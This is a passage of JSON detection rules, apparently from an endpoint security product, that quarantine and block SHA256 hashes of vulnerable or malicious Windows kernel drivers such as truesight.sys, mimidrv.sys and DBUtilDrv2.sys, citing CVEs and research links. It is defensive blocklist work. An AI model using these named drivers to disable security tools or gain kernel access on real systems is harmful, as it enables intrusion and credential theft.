+ "id": "a396a5e3-ab83-50ce-b84c-d1b4092ff7d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471285Z",
+ "creation_date": "2026-03-23T11:45:30.471290Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83fbf5d46cff38dd1c0f83686708b3bd6a3a73fddd7a2da2b5a3acccd1d9359c",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a39df2e5-f8fe-5c9b-a1a5-bc80d7be892b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824628Z",
+ "creation_date": "2026-03-23T11:45:31.824630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1912df289ebcd827d07c50f690902ad0ab1ca0921ddd5da4f4fcee5034e7525",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3a82e11-79ba-54ff-b68f-af7b78d771ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611028Z",
+ "creation_date": "2026-03-23T11:45:29.611029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "157ae92541eda2f5035435c63e1654adfa45c06e37b05cbb60d76a63daa93f04",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3b59f21-2719-5110-bdf8-eedbb133c11b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812258Z",
+ "creation_date": "2026-03-23T11:45:31.812260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a52f4f77c3d124dfb614f83c44d722ae55c55a8bc9aa6e5e879101b456386923",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3c22071-0b31-5780-bc24-6d65f04ceadc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818926Z",
+ "creation_date": "2026-03-23T11:45:31.818930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "253cb2f36969c990f0960c13135ab20b9e38011a5761cf1cfe1c3e99b9afce0f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3c3ff84-a30c-5930-87b9-0d7384349373",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465113Z",
+ "creation_date": "2026-03-23T11:45:30.465116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14b89298134696f2fd1b1df0961d36fa6354721ea92498a349dc421e79447925",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3c5955e-e179-5c4e-8154-459f9612fd1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614368Z",
+ "creation_date": "2026-03-23T11:45:29.614370Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3c8343d-9d1c-58b8-8fad-5b3fb38f63c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983246Z",
+ "creation_date": "2026-03-23T11:45:29.983248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4720b202c4e6dd919222fe7b1f458705c0ed1ccc17ec4ba72a31eef8559b87c7",
+ "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3db3417-859c-5393-bc64-db0774694921",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812490Z",
+ "creation_date": "2026-03-23T11:45:31.812492Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f66a9cc214782799be3bdb1014d1ec4dfb4b6ba8f209541c4e0764469b1e123",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3dcb793-4f1a-5753-bc39-2de15ce8f40a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822683Z",
+ "creation_date": "2026-03-23T11:45:31.822687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "337ccdb7e3a677345eb209b58cfa8896aaf80b1171e615fc5673caff9756186d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3e653c1-c9f6-5a4c-a3ee-2187375a2cf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490981Z",
+ "creation_date": "2026-03-23T11:45:31.490984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490992Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1a853f8a96a02d605cce4af31abb94ab234effda7a277958da4404c10e1be27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3e7125a-2506-5dbb-804a-d1f38d5feed7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476677Z",
+ "creation_date": "2026-03-23T11:45:30.476680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1aee4d8a00f126582c4488025c7451fdbb9d0becbbfd58a396a2ac52011fac14",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a3fcf42b-99e9-540c-95e6-c27eb037276f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464146Z",
+ "creation_date": "2026-03-23T11:45:30.464150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a42f4ae69b8755a957256b57eb3d319678eab81705f0ffea0d649ace7321108f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a400a95d-6df1-5aec-96d2-f03bfa855104",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149826Z",
+ "creation_date": "2026-03-23T11:45:31.149828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d81e18a15f71397fb3ffba4f85d2b11f43a096c448544801ecc8c126cbda6e47",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a40c40a9-edea-543e-b6b7-095f63bc2241",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614300Z",
+ "creation_date": "2026-03-23T11:45:29.614302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f3e67f9454cb009716b89c0a296dcde73aa29145b7dcf776b81605932785b91",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a41768ec-7139-5541-8624-c2db288a7950",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821130Z",
+ "creation_date": "2026-03-23T11:45:31.821133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5abe2868d794a00debbeda3f6ac226ab8c5b8101fd27cd61e62d806e7810e511",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a42c9756-d8c7-5ab5-8bb6-f7693e2b16de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470784Z",
+ "creation_date": "2026-03-23T11:45:30.470788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b29cf0840f2efe394091e07e6701c44916a9e3dafdef6952c1d28fbeb4649df3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4344b0b-c8b3-5981-9937-4a309c1e0e67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828936Z",
+ "creation_date": "2026-03-23T11:45:31.828938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828944Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fdfa7bec4063f465119df9587a268d1cca777b4c0e0d8e95d1189a3c7846d10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a440620e-bd1b-5a1c-8a0b-d7b1ff49f043",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456103Z",
+ "creation_date": "2026-03-23T11:45:30.456107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a082cdb569b9f1f82252402fa05785fd409222912d5b9e5423299819e6f940ed",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a44e20d5-cdec-5e1b-862b-deaad3c9dfaa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821670Z",
+ "creation_date": "2026-03-23T11:45:30.821673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61f3b1c026d203ce94fab514e3d15090222c0eedc2a768cc2d073ec658671874",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a44fa1f9-671c-5378-ba22-09922073b2e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456595Z",
+ "creation_date": "2026-03-23T11:45:30.456598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456607Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "969f73a1da331e43777a3c1f08ec0734e7cf8c8136e5d469cbad8035fbfe3b47",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4802692-f5a6-54b8-8da5-6132fb3f246c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622650Z",
+ "creation_date": "2026-03-23T11:45:29.622652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83f7be0a13c1fccf024c31da5c68c0ea1decf4f48fc39d6e4fd324bbe789ae8a",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4859bef-e5d8-5b43-938e-3a497e89f50a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
